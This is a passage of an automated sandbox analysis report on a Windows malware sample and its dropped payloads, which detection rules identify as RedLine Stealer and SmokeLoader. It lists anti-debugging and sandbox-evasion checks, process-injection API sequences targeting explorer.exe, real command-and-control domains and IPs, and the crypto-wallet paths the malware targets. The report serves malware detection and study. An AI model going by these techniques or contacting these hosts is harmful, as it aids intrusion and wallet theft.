e`1Func`3CallSiteCreateTargetCSharpArgumentInfoCSharpArgumentInfoFlagsInvokeMemberfdfg9i3jn4TimeZoneInfoget_Localsdf934asdasdk9345asdasdk8jasd
                      Source: DA6F.exe, 00000011.00000002.550293164.0000000000F85000.00000040.00020000.sdmpBinary or memory string: VMciUs
                      Source: DA6F.exeBinary or memory string: VMciU
                      Source: 2D0D.exeBinary or memory string: vMCIKUNKoB0HmFY2lKl
                      Source: E8E7.exe, 0000001C.00000002.564213776.0000000005E34000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SAT
                      Source: E8E7.exe, 0000001C.00000002.564105663.0000000005E1D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: E8E7.exe, 0000001C.00000002.538213988.0000000000B4D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: DA6F.exe, 00000011.00000002.559151421.000000000180E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??
                      Source: 2D0D.exe, 0000001B.00000002.525155125.00000000010C1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeThread information set: HideFromDebugger
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\rfudbriSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_004288F0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_02100042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_022FCE0C push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_020F0042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\rfudbriProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_0041EE50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_1_00402691 LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_0041EE50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_00423530 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_0041EE50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_00423530 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 16_2_0041DC40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 16_2_0041FB80 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: host-file-host0.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 45.87.154.2 80
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 187
                      Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.top
                      Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: rfudbri.6.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\rfudbriSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\rfudbriSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeMemory written: C:\Users\user\Desktop\X5lLjSzDd8.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\rfudbriMemory written: C:\Users\user\AppData\Roaming\rfudbri base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeMemory written: C:\Users\user\AppData\Local\Temp\E8E7.exe base: 400000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_02100110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeThread created: C:\Windows\explorer.exe EIP: 2F91930
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeThread created: unknown EIP: 4EC1930
                      Source: C:\Users\user\AppData\Roaming\rfudbriThread created: unknown EIP: 5C31930
                      .NET source code references suspicious native API functionsShow sources
                      Source: E8E7.exe.6.dr, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, YQUl6FsJIQpBDXNkRS/wdOavvWYrPNEvA9OIm.csReference to suspicious API methods: ('jovVyLVw7J', 'GetProcAddress@kernel32'), ('AIVVUDEGBq', 'LoadLibrary@kernel32')
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.2.E8E7.exe.750000.0.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.E8E7.exe.750000.3.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.E8E7.exe.750000.2.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.E8E7.exe.750000.0.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.E8E7.exe.750000.1.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 24.2.E8E7.exe.110000.0.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.E8E7.exe.110000.0.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.E8E7.exe.110000.3.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.E8E7.exe.110000.2.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.E8E7.exe.110000.1.unpack, Faints.Classes/ValueDicClass.csReference to suspicious API methods: ('FlushAlgo', 'GetProcAddress@kernel32'), ('SearchAlgo', 'LoadLibrary@kernel32.dll')
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeProcess created: C:\Users\user\Desktop\X5lLjSzDd8.exe "C:\Users\user\Desktop\X5lLjSzDd8.exe"
                      Source: C:\Users\user\AppData\Roaming\rfudbriProcess created: C:\Users\user\AppData\Roaming\rfudbri C:\Users\user\AppData\Roaming\rfudbri
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess created: C:\Users\user\AppData\Local\Temp\BEE7.exe C:\Users\user~1\AppData\Local\Temp\BEE7.exe
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: explorer.exe, 00000006.00000000.283831707.0000000001400000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: explorer.exe, 00000006.00000000.324335531.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000006.00000000.283831707.0000000001400000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000006.00000000.303266673.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
                      Source: explorer.exe, 00000006.00000000.283831707.0000000001400000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000006.00000000.333278107.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\E8E7.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FB48.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\E8E7.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_00420A40 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: DA6F.exe, 00000011.00000002.556752293.0000000001778000.00000004.00000020.sdmp, E8E7.exe, 0000001C.00000002.538213988.0000000000B4D000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3ce5de0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3d83490.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.E8E7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3d83490.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3ce5de0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.456220625.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.454280877.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.522863537.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.460712066.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.478488816.0000000003D03000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.458201711.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DA6F.exe PID: 6580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 2D0D.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: E8E7.exe PID: 5480, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 00000003.00000002.341140573.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416663548.0000000002410000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.341021768.0000000000540000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.320895536.0000000002F91000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.430943063.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416737725.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.431087130.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: +l5C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: +l-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmpString found in binary or memory: +l9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: DA6F.exeString found in binary or memory: set_UseMachineKeyStore
                      Source: Yara matchFile source: 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DA6F.exe PID: 6580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 2D0D.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: E8E7.exe PID: 5480, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3ce5de0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3d83490.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.E8E7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.0.E8E7.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3d83490.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.E8E7.exe.3ce5de0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.456220625.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.454280877.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.522863537.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.460712066.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.478488816.0000000003D03000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.458201711.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DA6F.exe PID: 6580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 2D0D.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: E8E7.exe PID: 5480, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 00000003.00000002.341140573.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416663548.0000000002410000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.341021768.0000000000540000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.320895536.0000000002F91000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.430943063.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416737725.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.431087130.00000000006A1000.00000004.00020000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
